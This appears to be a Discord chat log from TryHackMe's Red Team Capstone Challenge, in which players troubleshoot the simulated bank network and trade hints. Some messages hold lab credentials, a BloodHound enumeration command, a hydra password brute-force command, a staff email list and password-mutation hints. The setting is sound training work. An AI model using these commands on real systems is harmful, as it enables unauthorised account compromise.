Can someone reset .52 lab?
Thanks, I will try it again. When I tried a couple of times before, the user under PsExec was corp\administrator. You can't RDP to root with a CORPDC user.
Gave +1 Rep to @white summit
RDP to bank dc with the created admin instead
Can anyone help me with this issue: The DNS operation timed out after 3.005955934524536 seconds. On my Kali VM the resolver is inactive.
That is in bloodhound.py
Thanks dude! Loved it, wish I could do it again
Gave +1 Rep to @trim beacon
add --dns-tcp to your command at the end
assuming you are using proxychains, UDP has trouble
Thank you shadow, but I have that already , proxychains ./bloodhound.py -d c10.200.116.11 -u laura.wood -p "Password1@" -c all -ns 10.200.116.11 --dns-tcp
some of output
[proxychains] Strict chain ... 127.0.0.1:9050 ... 10.200.116.102:53 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 10.200.116.102:53 ... OK
I'm like you @slow garnet, I can use proxychains with nmap, smbclient and reach the DC but I'm unable to launch my bloodhound against it since I'm always receiving a timeout.
The resolution lifetime expired after 3.103 seconds: Server 10.200.52.102 TCP port 53 answered The DNS operation timed out. Any hints guys?
proxychains -q ./bloodhound.py -d corp.thereserve.loc -u laura.wood -p "Password1@" -c all -ns 10.200.subnet.102 --dns-tcp
is the exact command shadow used and it worked fine for shadow
Yeah, it doesn't work for me
I can't wait to see the list of winners.
Thank you all, rooted!!
Gave +1 Rep to @white summit
I am having trouble getting the last flag to work. I don't understand, the capturer has no transactions, it just disappeared. Fix: delete flags 18 and 19 and redo them before submitting 20.
Oh wait. I guess the PIN part wasn't needed. Thanks for the lab!
@trim beacon if I can see the Transactions capturer view should I be able to see the dummy transaction or it means I'm getting closer to it?
Should be yes, best to use an incognito tab just to make sure cookies are not screwing with your output that you are seeing
I can immediately see it after changing "something" but no transactions appear. If I change "something else" I simply lose also access to the dashboard data. Am I missing something?
Now my password is wrong, something on your end or should I redo everything?
Nope, you are going to have to figure this one out. SWIFT is isolated, so it is the one system that users cannot tamper with through means such as altering the passwords
If your session token is not correct, you will not be able to see transactions. If you are in a browser, you can use Ctrl + Shift + C to pull up the network debugger. That will show you why transactions are not being loaded with most cases it being that your token is not valid. To fix that, you need to authenticate. Again, I suggest an incognito browser so old tokens don't screw you over
A SWIFT reset should do the trick for you
Thanks @trim beacon
Gave +1 Rep to @trim beacon
Use DNSchef hak5 video on proxychains dnschef and bloodhound
Source: https://github.com/fox-it/bloodhound.py
Usage:
- PIP: pip3 install bloodhound
- Docker
- docker build -t bloodhound .
- docker run -v ${PWD}:/bloodhound-data ...
Thanks @white summit but after all it was not necessary.
Gave +1 Rep to @white summit
All rooted! Thanks @trim beacon for the challenge, please release more of this in the future!
Gave +1 Rep to @trim beacon
@trim beacon hi, can you help me? I made a mistake when wanting to submit flag 20. I already approved the wrong transactions, because I did not see my ID's transactions I just approved the wrong ID's transactions. After that I just noticed my transaction had not yet had its PIN submitted. I think after submitting the PIN my ID's transaction will be in the approver account. How can I reset this process?
You need to reset the SWIFT process, i.e. redo from flag 17 @civic mountain
login to ssh --> then 2 [ authenticate ] --> then reset the swift process [ 3 ]
you're good to go then
thx bro, i'll try
Gave +1 Rep to @granite valve
when's the top writeups coming out? eager to know new techniques.
Soon™
cool !
Timer is ticking down, thanks again @trim beacon for this amazing network, happy to have had the opportunity to try it out!
Gave +1 Rep to @trim beacon
Can this be claimed by the person who has paid the wp? But I don't seem to see the coupon
You'll get it E-mailed to you.
All winners will be contacted via E-mail if you've won.
okay, thanks
Where will the reports of the winners be published? i really want to read them
On the blog soon™
I have submitted a write up, but didn't receive an email?
All will be sent, no worries - emails are in progress
Okay thank you
Gave +1 Rep to @hidden galleon
My mini report was... 7 pages. Admittedly I didn't flesh it out as well as I could have and didn't find many exploits. If I had business access I'd go back and see how many other paths I can find
Just out of pure curiosity, could we see the final stats?
- 1000+ room joins (don't know actual total since we kick users each week)
- 805 profiles registered on e-citizen
- 317 users submitted at least one flag
- 3922 flags submitted in total
- 160 room completions
Overall a bit higher on completion rate than I initially thought we would achieve but still awesome!
Awesome indeed! Everyone tried hard
Yeah 160 completions is quite a lot. It was a fantastic network though so I am not too surprised. Thanks again am03bam4n for making it!
Really enjoyed doing this, so much better than a typical ctf! Learned so much in a short amount of time. Huge thanks to @trim beacon and the rest of THM for putting it all together!
Gave +1 Rep to @trim beacon
Thank you for the feedback!
Gave +1 Rep to @fervent sail
Indeed! Time to get building on the next challenge!
Thank you for the feedback!
Can't wait, whatever you come up with will be great
A Red Team Capstone type challenge with a nice SIEM to thwart off attackers?
Are we allowed to post write-ups/walkthroughs on our blog? As far as I get, things won't be the same on the B2B side
Yeah, some automated blue teaming there to kick out the baddies!
I think that will be fine, since we are rotating all flag values. But perhaps since it is a winning writeup maybe coincide your release with the THM blog post?
Of course, no problem, I have to take the time to polish things more anyway as I tried to explore other paths
Sounds good! We are just finalising everything for the shift and then the blog posts are next on the todo list
Awesome, looking forward to reading some write-ups and learning even more
what about the e-citizen hints??? do you not need to finish that first????
Can we use this channel to share the writeups and/or notes with each other? I have a fully documented GitHub repo for it. I'd also like to see alternative exploitation methods from other players.
haha I'll see how I feel and then maybe slowly add hints. But with the blog post releases that at least gives some hints as well!
Again, happy with this, my ask is just that we wait slightly for the blog posts to go out first, then can share discussions here as well
Thanks
Gave +1 Rep to @trim beacon
Maybe you sent the email to the wrong email address, but I still haven't received an email
I'll follow up. We're using emails attached to your thm account
So should all emails already be sent out? Because if yes, I also did not receive an email yet :D
We're on it!
Can you dm me? Just had confirmation we've tried to contact you & got no response until now.
All missing runner-up emails will be done ASAP!
The 2 million thing is keeping the marketing team busy, sorry for the delay
No problem. The 2 million users thing is important so take the time you need.
Same here - no email, but I figured you all are busy when 2M announcement came out, which congratulations!
Ah, there it is, thank you!
Hello! I have just reached out to all runners-up. Please check your emails
Thank you!
Gave +1 Rep to @tribal condor
I received it, too. Thank you.
Gave +1 Rep to @tribal condor
Also received it, thanks a ton!
Thank you!!!
Gave +1 Rep to @tribal condor
Thank you again. Does everybody get the same?
Gave +1 Rep to @tribal condor
Yes, every runner-up will receive the same
Hi yo. Just wanna ask. We will not be able to access this network anymore, right? It's now only for business subscription?
Yes, it will show you that if you try to access it
Alrighty. Thank you. Great thing I had it completed prior.
Damn, I missed this room
same
Any thoughts on making this room open for all again ?
the cost is too high... they made it open for everyone for as long as they could
Oooh ok, thank you for the info
Gave +1 Rep to @cerulean wraith
no problem
am03bam4n has stated that he would like to make the badge acquirable again later down the line if possible
Wow nice to hear
First writeup is up: https://tryhackme.com/resources/blog/azkraths-red-team-capstone-write-up
Congrats again @viral yew !
Oh man, looking at this write up (which was well done) I can see where I went wrong. Good job I still have access to the room
wait whaaaa
I'll DM you?
nah rather not step into that minefield.....
Lol, it's legit
send a DM if you want then... shadow just got spooked that you somehow got access and are therefore breaking thm rules
Oh sweet the first report, glad to check these out and improve my own reports by learning from them.
I know @quaint knot has set up a 'business group' where they put £40 a month in (£400 a year) and they get a business plan as a group of 5. I would be tempted if I had the money so that's probably how he's still got access.
Looks like the second place report is up on the blog, nice
Incorrect.
Fair enough, thought it was a potential avenue
I did set up a business group for Hack Smarter -- my brand for streaming and teaching -- but it's full. I'm hoping to show off some of the business features in upcoming streams
How can i subscribe to capstone?
you can't really do this anymore unless you have a business account
Thank you i don't have account business
Gave +1 Rep to @cerulean wraith
How can you do the capstone project? Been a part of THM for a month now
oh sorry to tell you that you are too late as the event for this network ended... the only way to do it nowadays is if you have a business account with tryhackme
Gotcha. That sucks. I wanted something like that to really test my skills
Wreath, Holo and Throwback are networks, not like this one was, but they're still networks.
@red yarrow
Is there any report made in
How someone was able to compromise AD just by getting onto their network
Meaning got the AD control and did all AD enumeration without being an AD user
Is this for homework?
Yes
We don't help with homework
Bro homework meaning I am doing this for my company
Ethically
You should ask your supervisor or line manager for help then, not outsource it to discord?
I thought the red team capstone challenge was meant only for enterprise customers, and never went back to actually check it.
was browsing through the library today and I don't believe what I saw, so just asking for confirmation here, is the red team capstone challenge accessible to VIP users?
If it's there, it's there
But cc @lyric stream or @red yarrow for awareness.
@lyric stream @red yarrow - Am I seeing the right thing here?
Yes it is.
@hollow yoke
@lyric stream just one more question, do you plan on keeping it available for the VIP users or that might change in the upcoming future.
Sorry, didn't notice I had alerts muted
Oh its alright!
Heya all, I posted in room help too but thought maybe you all might have a thought also.... I'm doing the data exfiltration room, on task 7 (ICMP exfil) but cannot get the data to the listener in metasploit... any idea what I might be doing wrong? https://tryhackme.com/room/dataxexfilt
Is it still available for vip users ?
Yes
I guess I need to subscribe first to be able to see it
Yeah, maybe.
The link is on this channel.
it is still not on the main learning page but if you search for it on the learning search page it shows up
I'm sure it is.
Nah, not there, I found it somewhere else.
yeah that is basically what shadow was saying
it is not on that list but it is in the searchable rooms list
Is there now.
Hello, is there an admin to whom I can write in DM? I may have a problem with the e-Citizen portal
Hello I just have 2 questions is this the same challenge that was launched earlier and how long will this lab be available for premium users ??
What's up?
Not admin, but I may be able to help
Can i DM pls?
Sure
Yes
Hello!
I'm not sure if your question has been answered already by the wonderful @pseudo parrot, but yes, this is the challenge that we released a year ago. We only had this open to individuals for one month, and then switched over to B2B users only.
However, it's now back for premium users (and back for good!)
Thank you so much
???? it was not when shadow checked.....
Was added today RE E-mail.
aah
MailAddr: X@corp.th3reserve.loc
IP Range: 10.200.X.0/24
These details are now active. As you can see, we have already purchased a domain for domain squatting to be used for phishing.
Once you discover the webmail server, you can use these details to authenticate and recover additional project information from your mailbox.
Once you have performed actions to compromise the network, please authenticate to e-Citizen in order to provide an update to the government. If your update is sufficient, you will be awarded a flag to indicate progress.
"How can I access this email. I have already breached the perimeter but am not able to access webmail"
using thunderbird or another email client and logging in and having the /etc/hosts file set up correctly
I was using the AttackBox and it crashed. I tried resetting my progress and leaving the room. It still says my THM username is registered. Is there any way to reset this or reset the password?
@trim beacon can you see the above^?
Will authenticate not work?
Or did you not write down the credential details?
We do not have a mechanism to reset password. This would require an out of band system to ensure secure resets which isn't available.
There is a warning that you need to make sure to save your credentials since they won't be displayed again.
However, you do have the option to create a new account and use that. So an account different than your username in THM, which will be fine
Can anyone share stmp and imap setting for corp.th3reserve.loc
I didn't write down the details. I saved them on the attack box. Not thinking lol.
Hi @pseudo parrot what do you want me to send a screenshot of ?
What you're having an issue with
So I am trying to register as said in the information but I don't get connected
You don't need to hide your IP, in fact, it will be better if you show it
What's your IP here?
it is 10.200.17.13
you should be able to yeah
So it is a VPN issue ?
I've pinged one of the best people who may be able to help.
Thank you
Gave +1 Rep to @pseudo parrot (current: #2 - 1929)
You are trying to connect to the wrong IP? If you have 10.200.103 in your diagram, your connection should be to 10.200.103.250, not 10.200.17.250?
Ah I see that was @pseudo parrot's IP
Are you on the attackbox or your own machine? If you can't ping it, it means your VPN is not connected. You need to check out why your VPN is not connecting. So if attackbox, there are certain steps there, if your own machine, check what's happening there when you run the VPN file
Hi, is anyone experiencing problems with the internal ovpn? Mine keeps doing a soft connection-reset. (changed the IP already)
I'm trying to connect with my own machine, but any suggestion how I can check what's wrong with the VPN file?
Would suggest starting to provide the output to us here so we can see what is happening? But also reading the output will help?
Will do, having some WiFi issues so might send it in the morning if it doesn't work
Thank you
This is a little bit of a thing for you to figure out. You can read up a bit on why this can happen, but also maybe think about (and play around with) how your THM VPN works and what policy a company might have in place to prevent larger compromises if a VPN profile is leaked
This was a neat part!
I'm confused how this works... I have initial creds and logon (I would say "breaching perimeter", and possibly "breaching AD" are both done)... but I haven't seen a flag to input yet
am I not as far as I think?
Check your E-mails.
huh
When you signed up to the E-citizen portal, it created an E-mail address for you.
Log in to it.
oh okay yeah I need to log in to the web mail.. I see now in the brief
let me just fuzz the endpoint and I'll get right on that lmao
there are no emails other than scope of engagement @pseudo parrot ..
Maybe you should read the entire brief. Including the portion on how you get flags
I am going to provide this information again and then pin it. The last point, about reading and understanding the project brief, is incredibly important. The room simulates a red team engagement. The most important part of such a real-world engagement is understanding the actual "rules of engagement". This is the thin line that makes your actions as a red teamer legal. Not following this, you are not a red teamer, but a malicious hacker. Please read the instructions before you just start.
Most Important to Remember to Conquer this Capstone Challenge
- This is a practice exercise for Red Teaming, not a Capture the Flag game. Your CTF skills alone will not be sufficient to complete the challenge.
- The exercise tests the skills you learned in the Red Teaming Learning Path. We recommend completing at least 80% of this path before attempting the challenge. If you get stuck, go back to the path, as it covers the techniques you need.
- There are different ways to complete this exercise. If you have trouble with a specific attack, try different approaches and avenues.
- Carefully read Task 2 "Project Brief", as it contains crucial information you will need to complete the challenge.
Thank you for the reply
Gave +1 Rep to @trim beacon (current: #28 - 269)
Hi, I can't log into the VPN website with the SMTP creds, not sure if that's intended or a bug?
Hi, anyone know how to tackle this error "FATAL ERROR: No supported authentication methods available (server sent: publickey,keyboard-interactive)"
While pscp attempt
Check the domain of your credentials. They aren't valid credentials for your target. You have to breach the perimeter yourself
Please provide more verbose information in order for members here to provide with assistance or potential hints
Hi, I am providing you with the OVPN output as you asked.
You can see the mismatch in the network information you provided us (10.200.17.13) and the route being pushed:
net_route_v4_add: 10.200.116.0/24 via 10.50.113.1 dev [NULL] table 0 metric 1000
My suggestion would be that you regenerate your VPN profile
I have already done that 2-3 times but the result ends up being the same!
Not sure what to tell you. You can see that your VPN profile does not match the network IPs you provided us. My only other suggestion would be to leave the room and then rejoin. Regen your VPN profile then again and connect. Make sure there is a match between the route being pushed and what you see in your network diagram. If these two don't match, you won't have luck. If that does not work I can refer it to the support team to see what is happening. But have never experienced a VPN server generating a profile different than the network you have joined.
Let me try it out again and will let you know how it goes
Also, if the issue persists, I will need an actual image of your network diagram together with the VPN profile file that was pushed to raise it to support.
Shall I DM those to you ?
hey I remember I faced this issue before too and had sent you the details in the DM can you check your DM's
you had solved it with another file that time
I appreciate the reply yesterday. I did change more than just the IP and tested different user combinations. The push_reply gave me invalid IPs two days ago. The network restarted, it gave me valid internal IPs (but I wasn't connected to the internal). And today it's back to giving me these invalid IPs: PUSH: Received control message: 'PUSH_REPLY,route 10.2001.21 255.255.255.255,route 10.2001.22 255.255.255.255 If this is intentional, I apologise for taking up your time
I can't see the message in my DMs? Not sure what is happening there?
Will just DM you again
No stress with asking questions! It is part of what you need to figure out there yourself. Again, routes might have updated after there was a legacy VPN profile left there. So what can you do here
pscp laura.wood@10.200.7.21:/users/laura.wood/Downloads/20240206214108_BloodHound.zip ~/Documents
I know, but the credentials I got (using bf) aren't working for the VPN website, and are working for the webmail platform
I wonder what they were used for
and I'm not talking about the creds given by the ssh server, I'm using bruteforced credentials
I know what Creds you're talking about
aren't they supposed to be used to connect to the vpn platform?
Can you tell me the username you brute-forced?
there's laura.wood and mohammad.ahmed
Leaving the room and joining again solved it for me
Do some research on what this error message means: "No supported authentication methods available (server sent: publickey,keyboard-interactive)"
Review the syntax of how you are providing the username and password. Remember, different authentication methods need different syntax.
Folks, help me out here.
What is the difference between room https://tryhackme.com/room/redteamcapstonechallenge and ~~https://tryhackme.com/room/redteamcapstonechallengerX ~~? The network diagram is clearly not working on the second one...
Ah, when I clone the room to make an assignment it breaks the diagram.
Hello, cloning a Network room will not work currently.
I tried just specifying the username (e.g just laura.wood), using @corp.thereserve.loc and @corp.th3reserve.loc for the email domain and url encoding the fields
This won't work, as it uses a different authentication mechanism. The specific mechanism is covered in the AD rooms and has a different syntax that is required. Also, trying for @corp.th3reserve.loc won't work as this isn't the organisation's domain. The @corp.th3reserve.loc is one provided by the organisation for domain squatting purposes, as mentioned in the project brief. To understand more about domain squatting and its use, please see the red team learning path
ok, also is there a problem with the VPN or the room itself right now? I can't ping any machine
I tried leaving and joining a few times
can't ping with attackbox either
Doing this you are making the issue worse. As mentioned to another user in this channel, when you leave the room and rejoin, there is a good chance that your VPN profile is invalidated even if it shows a connection. Use the same methodology and help provided in all of the other AD networks for debugging your connections. This is a challenge, and similar to an actual red team, you will be expected to figure some stuff out
Fixed. And for my problem with the reserve VPN website, I was doing everything correctly since the very beginning but for some reasons you can't login on the root webpage, you have to do it in /index.php
I can't see the Capstone adapter when using the attackbox. Is it only on my end?
Can you screenshot?
@pseudo parrot
I guess the network is already up and running, but no Capstone adapter.
I started "Breaching Active Directory" network just for testing.
Is your network running?
Network state running, but unable to reach any devices including VPN x.12
I have done capstone, but re-doing for writeup and the VPN file obtained from the webapp is adding these routes:
rather than the 10.200.X.21 and 22
fixed with adding my own route in kali but... doesn't seem like expected behaviour
Any chance I can get a sanity check on the initial access? Think I'm probably making things harder than they have to be
Can you use spoiler?
Or do you need to dm?
I can spoiler, I just wasn't sure about the rules for it
||I'm trying to start with the website (not attempted anything to do with the mail yet), and found the cache in /storage, a database.php file I can't download, the code in /artisan, found it's running php 7.2.24 on ubuntu 18.04.17, and has zend 2.3.0. Not been able to do much with the todolist, but I could send a phish to that email address? Somewhat stumped on how to proceed from here, and I'm not convinced snooping around those file systems is doing anything besides waste my time||
I have a 2200 word file of everything I've attempted so far lmao
Writing down everything
||there are steps to take to access the Web page, there is a clue hidden, but in plain sight, that you might have overlooked||
||I know there's ssh on port 22, and I have the standard password list, so I could try a password spray attack on that?||
Something even simpler.
Alright, definitely been overcomplicating it then
||OSINT on the developers, or is that still overcomplicating?||
Osint isn't.
Isn't overcomplicating, or isn't needed here?
Overcomplicating
Right, thanks
||I'm once again lost. Done loads of enum, got a list of emails, and a proposed list of passwords based on the defaults, but no luck with anything. Trying to use both lists for the email server to no avail||
Got over 1000 passwords in that list, was hopeful one would work lol
May be using ||hydra|| wrong? I'm running ||hydra -L USERNAMES -P PASSWORDS mail.thereserve.loc smtp|| where ||10.200.103.11 mail.thereserve.loc is in my /etc/hosts||
What's your password policy?
And usernames?
Usernames: ||antony.ross@corp.th3reserve.loc
ashley.chan@corp.th3reserve.loc
brenda.henderson@corp.th3reserve.loc
charlene.thomas@corp.th3reserve.loc
christopher.smith@corp.th3reserve.loc
emily.harvey@corp.th3reserve.loc
keith.allen@corp.th3reserve.loc
laura.wood@corp.th3reserve.loc
leslie.morley@corp.th3reserve.loc
lynda.gordon@corp.th3reserve.loc
martin.savage@corp.th3reserve.loc
mohammad.ahmed@corp.th3reserve.loc
paula.bailey@corp.th3reserve.loc
rhys.parsons@corp.th3reserve.loc
roy.sims@corp.th3reserve.loc||
Passwords
If you don't wanna download the file from a stranger on the internet, the policy was to ||append a number and one of the special chars to the end of each password, so JustSomePassword1%, JustSomePassword%1, JustSomePassword2% etc||
Are you only using % ?
Yeah, I'm gonna see your list.
Lol, I specialise in Malware
Yeah, the password is in your list.
Hmm, I wonder why my command no worky then
I think everything is in order?
Unless I need to logout of my account beforehand?
Nope.
Huh, so I have the username, password and correct IP, and it's still failing? Could it be a network issue?
ran it again as a sanity check, 0 combos still
I'm trying to find my notes.
You're going to kick yourself.
I dont have the [25][smtp] line?
pass
my emails have corp.x.loc
OH
ffs
You're getting closer
haha
(╯°□°)╯︵ ┻━┻
my email isn't the same domain, is it haha
e not 3
Alright, give it 10m for hydra to run again 
Shouldn't take that long, I can't remember, it's been a while.
Always slow in attackbox
Should probably just be using my kali VM, can save states then
Especially on user and password lists.
Perhaps it's not the inbox the login gives, that you would be interested in
I'll leave you to work this one for a bit, if you *get* really stuck I can hint.
Not yet.
You might get one (or 3) when you log in to something.
I'm gonna leave it there for today, been at it for about 6 hours
My typing fingers are tired
Take note of the accounts you have
Yeah, I have 2600 words already
And it's just the 1 email account thus far
It's quite difficult I think, compared to the standard boot2root's
May have to do throwback again, as I took no notes last time haha
The Throwback network was retired a little while ago
Oh, well i guess I'm not doing that again then
This is the capstone project you should be attempting after the Red Team path.
ie
All the skills and techniques needed for this are taught in that path
Yeah, I've done lots of prep for this
It's still a challenge though
Which is good
I enjoy a challenge
This certainly is
And there are over 300 attack paths.
||the two users whose email creds I found with hydra are not working on the vpn machine (10.200.X.12). Am I wrong to assume that the creds should be usable here to get the vpn for the internal network?||
The creds and VPN are related and you're so close.
You actually do this all the time if you use a vm
||Does it have to do with changing the ovpn file found in /vpn? I noticed the "Issuer: CN=changeme" and "Subject: CN=temp4" lines look ripe for changing||
since someone reset our room, the openvpn server in the environment is kicking out wrong addresses... making it impossible to do the legwork on wrk1 wrk2...
can someone please look at this?
The network was nothing but stable... why did folks reset it
workaround:
sudo route add x.x.x.21/32 dev tun0
Thanks man!
Gave +1 Rep to @left rune (current: #1993 - 1)
It is not impossible... There is a huge amount of paths to get in and do everything
Maybe that's intentional...
@cerulean wraith yeah, that might be true... but once you set up your entire c2 pivoting chain using sliver... you'd rather stick to the plan
mind you - it happened after the reset...
counterpoint: if you do this kinda work for a company and just stick to a single approach and tell them they are unhackable you are doing a poor job
wow - who got on your bad side today.... I think I am done talking to you
oh sorry
was not meant to come out harsh and unforgiving
after all this network is emulating a real life scenario to the T
if that would be the case there would have been a proper EDR and not windows defender...
you say that but a lot of companies still only rely on microsoft products
not my customers
fair enough
Is the server down?
Running for me.
can't ping any machine
most of the machines on this network are windows machines... which generally don't respond to ping.... though the DCs might but those are behind the firewall
I've been working on it until yesterday and everything was right. I'm trying to ping the vpn, web or webmail machines and none of them works.
ah
well try for network reset or make sure the network is running
you can do this by refreshing the tryhackme network page
I've already done all of them.
As you can see the output of the connection is: net_route_v4_add: 10.200.103.0/24 via 10.50.99.1 and there should be access to the machines.
Only one 1+
Now waiting for the network to start over
It's late for me now so, I'll try tomorrow
Now it's working.
question. I'm doing the redteam pathway. will we be using everything we learn such as building pass lists and such
Yes
can't guarantee it but basically yes... you will most likely have uses for everything on the red teaming path for this network room
Dang imma go thru this many times before I hit this challenge
Any help with evolution? I cannot authenticate with the password that was given on the e-Citizen platform.
evolution is a mail client app scrubz
they are probably trying to access their email for retrieving flags and/or phishing the users on the network
Oh.
Just use the web browser
There's not any webpage to access.
Oh there is
100%
I've used it.
It's not forgotten, you just haven't enumerated.
well I'll try again
Don't be scared to ask for help.
vhosts?
probably
I can't access vpn server port 1194
Restart the network
Hey hey, I've been stuck on this box for a while, so I'm just looking for a sanity check (no hints please)
How long did it take you guys to find the first exploit giving any sort of RCE?
quite a while
if you are very stuck and have not finished the red team path yet going back and finishing that will help tons
I've finished it already
I've finished about 600 rooms so far
but my windows skills are still lacking ;-;
I've been stuck for 12 or so hours
luckily not all of the machines outside the firewall are windows
well keep trying different things to get in.... eventually you might find your foothold
but I'm mostly looking for estimates of how long it took to get the first flag for people
thanks thanks :)
just to see if I'm really missing something
it took shadow about 3 days to get the first flag on this
though shadow has still not completed the red teaming path
Thanks thanks :)
Web server with issues?
Anyone to reset the network?
which subnet???
It's already done
Why am I getting "net_route_v4_add: 172.32.5.21/32" instead of 10.200.113.21/32?
because reasons
what reasons? According to the "Out of scope" section: Attacking any hosts outside of the provided subnet range. Once you have completed the questions below, your subnet will be displayed in the network diagram. This 10.200.X.0/24 network is the only in-scope network for this challenge.
shadow thought it was a bug for a while but it seems as if it is semi intended and depends on how the vpn server runs
I'm upset with this challenge. Every day there's some issue. I'm thinking about giving it up.
well there is a ton of different paths to get through all of it
but can understand the annoyances